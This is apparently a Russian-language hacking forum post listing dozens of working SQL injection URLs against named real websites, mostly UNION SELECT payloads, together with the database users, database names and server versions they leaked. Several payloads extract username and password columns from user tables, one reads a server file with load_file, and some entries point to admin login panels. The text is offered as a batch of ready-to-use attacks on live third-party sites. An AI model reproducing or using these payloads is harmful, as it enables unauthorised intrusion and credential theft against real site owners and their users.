SQL Инъекции

Code:

http://www.shooflypublishing.co.uk/news.php?id=-9+union+select+1,2,3,version(),5,6,7,8,9,10--

4.1.22 standart

 

Code:

http://starkis.ru/show_cat2.php?grid=-1+union+select+concat_ws(0x3a,user(),version(),database())--

starkis1@localhost:5.0.24-standard:db_starkis1

тиц 10

 

Code:

http://www.fcshakhter.by/stat_docs.php?cid=-1+union+select+1,cast(concat_ws(0x3a,version(),database(),user())+as+binary),3,4,5--

4.1.11-Debian_4sarge8-log:fcshakhter:fcshakhter@localhost

Code:

http://top.mlmbiz.ru/detail.php?id=207+and+substring(version(),1,1)=4

4.0.27-max-log

 

http://planit.cuna.org/12881/article.php?doc_id=-943'+union+select+1,2,3,4,5+--+

http://www.airram.com/gallery.php?categoryid=3+union+select+1,2,3,4,5,6,7,8,9+--+

http://businessandfinancemagazine.com/magazine.php?id=-59+union+select+1,concat_Ws(0x3a3a,username,password),3,4,5,6,7,8,9,10+from+www_users+--+

http://www.pracawmetropolii.co.uk/search.php?id=-2869+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+--+

http://bfbusinessclub.com/view.php?id=-552+union+select+1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14+from+information_schema.tables+--+

http://www.treasurevalleykidsdirectory.com/magazine.php?id=-55+union+select+1,2,concat_ws(0x3a3a,username,password)+from+users+/*+

 

k-konstruktor.ru - TC=10
http://www.k-konstruktor.ru/index.html?id=135&parent_id=5/**/and/**/1=2/**/union/**/all/**/select/**/1,1,1,1,1,version(),1,1/**/from/**/sys_users
version - 5.0.51a-24+lenny2-log
user - k_konstruktor_ru@localhost
database - k_konstruktor_ru
table - sys_users (user_password, user_login )
http://www.k-konstruktor.ru/index.html?id=135&parent_id=5/**/and/**/1=2/**/union/**/all/**/select/**/1,1,1,1,1,concat(user_login,0x3a,user_password),1,1/**/from/**/sys_users

admin panel - http://k-konstruktor.ru/admin/logon/index.html

 

Code:

http://www.calvert-wire.com/show_product.php?id=-1+union+select+concat_ws(0x3a,user(),database(),version())

Code:

[color=Red][B]root@localhost[/B][/color]:calvert_wirecom1:5.1.30-community

Code:

http://www.calvert-wire.com/show_product.php?id=-1+union+select+load_file('C:/Inetpub/wwwroot/calvert-wire/show_product.php')

 

bbeheer@localhost:cvc:5.0.37-community

Code:

http://www.cvc.nl/trainers.php?id=-25+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),database(),version()),8,9--

ruf_user@localhost:ruf_http:5.0.45-community-nt

Code:

http://www.rockiurbanfitness.com.au/trainers.php?id=-4+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version())--

tcbo01be@localhost:bosterhout:4.1.21-standard

Code:

http://www.tcbosterhout.be/trainers.php?id=-9+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8--

[email protected]:silencej:5.1.34-0.dotdeb.0

Code:

http://www.pianc.org/edits/article.php?id=-4000501+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user(),database(),version()),9,10,11,12,13,14,15,16,17,18,19,20,21--

 

myworldhw_data01@localhost:myworldhw_data01:5.0.67-community:redhat-linux-gnu

 

http://www.zlinaero.com/eng/viewvideo.php?id=-4+union+select+1,2,group_concat(0x0b,column_name),4,5+from+information_schema.columns+where+table_name=0x61757468&img=
MySQL 5.0.77
http://www.zlinaero.com/eng/viewvideo.php?id=-4+union+select+1,2,group_concat(0x0b,id,0x3a,userid,0x3a,pass),4,5+from+auth&img=
auth::id,
userid,
pass,
cognome,
nome,
permessi,
vedimodi,
expertmode,
progettista,
disegnatore,
costo,
attivo

 

Code:

http://www.kingmotors.ru/view_car_sold.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--

4.1.22-lk-log:kingmotors_king:kingmotors_king@localhostc-linux-gnu

 

Sex shop Oo

5.0.87:buderoti_site@localhost:buderoti_buderotic

5.0.51a-15-log:u1697@george-in:u1697

 

Code:

http://www.iglobalforum.com/conference_live.php?r=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a3a,user(),database(),version()),13,14,15,16,17,18,19,20+--+

 

root@localhost:biblioteca
Version: 5.0.51b-community-nt-log

 

rim1234@localhost:marmoon:5.0.51a-24+lenny1-log

Code:

http://www.marmoon.com/games.php?id=-464+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13--

yoquiero_dan@localhost:yoquiero_games:4.1.22-standard

Code:

http://www.yoquierogames.com/games.php?id=-98+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13--

rebous@localhost:rebounddb:4.1.22-log

Code:

http://www.reboundsports.co.uk/tips-games.php?id=-34+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--

 

Code:

http://www.present-show.ru/corporate.php?id=-1+union+select+1,2,3,4,cast(concat_ws(0x3a,version(),database(),user())+as+binary),6,7,8,9,10,11--

4.1.11-standard:db_presentshowresentshow@localhost

Code:

http://www.yamaha-center.ru/?vid=opis&obj=v&id=-3+union+select+concat_ws(0x3a,version(),database(),user()),2--

4.1.25-log:wwwkottedg_clubru_specuch:kottedgc_specuch@localhost

Code:

http://www.mos-afisha.ru/?page=17&id=-3+union+select+concat_ws(0x3a,version(),database(),user())--

4.1.22-log:melbis:[email protected]

 

Code:

http://backgammon.gambler.ru/tournir/arch.php?tournir_id=-11+union+select+concat_ws(0x3a,version(),database(),user(),@@version_compile_os)--

5.0.85:keks:keks@localhostortbld-freebsd7.2

Code:

http://www.vashstile.ru/profile.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,10--

5.0.22-log:admin_vashstile:admin_vashstile@localhost:unknown-freebsd6.0

Code:

http://www.pin-code.ru/?pageId=1&subId=1+union+select+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,10

5.0.77-logincodeincode@localhostortbld-freebsd6.3

Code:

http://www.funkit.ru/index.php?deviceCatID=1/**/union/**/select/**/concat_ws(0x3a,user(),database(),version())

funkit@localhost:funkit:5.0.77

Code:

http://www.9-ka.ru/index.php?nav=1'/**/union/**/select/**/1,concat_ws(0x3a,user(),database(),version()),3,4,5/*

только вот у меня проблема тут юзера не выводит

Code:

http://feodorovski.spb.ru/katalog.php?vars=1+union+select+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

5.1.19-beta:feodorovski:feodorovski@localhostortbld-freebsd6.2

 

http://pecpl.ru/main/index.html?id=1&nid=2/**/and/**/1=7/**/union/**/all/**/select/**/1,user(),1,version(),1,1,1,1/**/from/**/sys_users/**/limit/**/0,1
user - pecpl_ru@localhost
version - 5.0.51a-24+lenny2-log
database - pecpl_ru
table - sys_users (user_login, user_password)

http://pecpl.ru/main/index.html?id=1&nid=2/**/and/**/1=7/**/union/**/all/**/select/**/1,user_login,3,user_password,5,6,7,8/**/from/**/sys_users/**/limit/**/0,1

adminpanel - http://pecpl.ru/admin/logon/index.html

 

pharmacy_altec@localhostxsqlinjend

 

Вот небольшая партия sql-инъекций на довольно популярных сайтах:

ГУ-ВШЭ: _http://www.hse.ru/pressa2002/default.php?show=123+and+ascii(lower(substring(version(),1,1)))=51

UpTime: _http://uptime.ru/downtime.php?host_id=-1+union+select+login,2,password,4,5,6,7,8,9,10,11,12+from+users+limit+1,1

МИОО: _http://www.mioo.ru/podrnews2.php?idvalue=2144+and+ascii(substring(version(),1,1))=53/*

ManageeCMS: _http://www.managee.ru/system/admin/?module=entry&action=edit&block=gallery&master_id=' (нужно авторизоваться на _http://www.managee.ru/demo/)
_http://managee.ru/search/?q=%27&strict=0

ПЦУО: _http://couo.ru/search.asp (ввести ')

 

MSSQL

PR 4